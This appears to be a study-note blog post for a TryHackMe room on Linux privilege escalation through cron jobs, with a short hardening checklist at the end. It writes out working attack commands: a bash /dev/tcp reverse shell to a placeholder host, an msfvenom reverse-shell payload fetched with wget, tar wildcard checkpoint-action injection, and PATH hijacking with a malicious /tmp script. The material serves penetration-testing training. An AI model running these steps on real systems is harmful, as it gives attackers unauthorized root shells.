In this video walk-through, we covered Linux Privilege Escalation through the cron tab in Linux. Cron tab includes all cron jobs of programs scheduled to run at specific time.

Overview

  • Focuses on escalating privileges in Linux systems through cron jobs by:
    • Modifying writable scripts.
    • Exploiting wildcards in commands.
    • Manipulating environment variables.

Linux Cron Jobs

Cron jobs are programs or scripts which users can schedule to run at specific times or intervals. Cron table files (crontabs) store the configuration for cron jobs. The system-wide crontab is located at /etc/crontab.

OSCP Study Notes

HackTheBox Certified Penetration Testing Specialist Study Notes

1. Inspecting Cron Jobs

  • Command:
cat /etc/crontab

Purpose: Lists all scheduled cron jobs and their associated scripts.Example Output:

  • Two scripts identified: overwrite.sh and compressed.sh.

2. Privilege Escalation via Writable Cron Job Script

  • Steps:
    1. Locate the script:
locate overwrite.sh

2. Check script permissions:

ls -la /path/to/overwrite.sh

3. If writable, overwrite the script with a payload, such as a reverse shell.

    Payload Example:

    • Reverse shell in overwrite.sh
    bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1

    Open a listener on your machine:

    nc -lvnp <your_port>

    Wait for the cron job to execute the modified script and receive a root shell.

    3.Exploiting Wildcards in Commands

    • Target: compressed.sh, which uses a tar command with wildcards.
    • Steps:
      1. Create a reverse shell payload:bashCopy code
    msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f elf -o shell.elf

    Transfer the payload to the target machine:

    python3 -m http.server
    wget http://<your_ip>:<your_port>/shell.elf

    Create tar-compatible checkpoint files to exploit the wildcard

    touch -- "--checkpoint=1"
    touch -- "--checkpoint-action=exec=sh shell.elf"

    The cron job runs tar, which executes the payload due to the wildcard exploitation.

    Manipulating Environment Variables

    • Context:
      • Cron jobs often rely on the PATH variable to locate scripts or binaries.
      • If PATH includes user-writable directories, malicious scripts can be executed instead of legitimate ones.
    • Steps:
      1. Inspect the PATH variable
    cat /etc/crontab

    Create a malicious script in a writable directory (e.g., /tmp or ~/):

    nano /tmp/overwrite
    • Add a reverse shell or any malicious command.

    Ensure execution permissions:

    chmod +x /tmp/overwrite

    The cron job will execute your malicious script due to the modified PATH.

    Linux Privilege Escalation Checklist

    1. Writable Files and Directories:
      • Always check permissions (ls -la) to identify writable scripts or directories.
      • Modify scripts or binaries when permissions allow.
    2. Wildcards in Commands:
      • Exploit wildcards (*) in cron jobs using tools like tar to execute arbitrary commands.
    3. Environment Variables:
      • Check PATH values in /etc/crontab.
      • Place malicious scripts in directories included in the PATH variable.
    4. Safe Practices:
      • Update system tools like tar to prevent exploitation.
      • Avoid including writable directories in the PATH.

    Conclusion

    • Techniques Covered:
      • Modifying writable scripts.
      • Exploiting wildcards in cron jobs.
      • Using environment variables for privilege escalation.
    • Outcome:
      • Demonstrated how to escalate privileges to root using cron job vulnerabilities.

    TryHackMe Linux Privesc | Room Answers

    What is the value of the PATH variable in /etc/crontab?

     
    Video Walk-through
     

     
    , ,
    Show Comments

    MasterMind Study Notes

    About the Author

    Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

    View Articles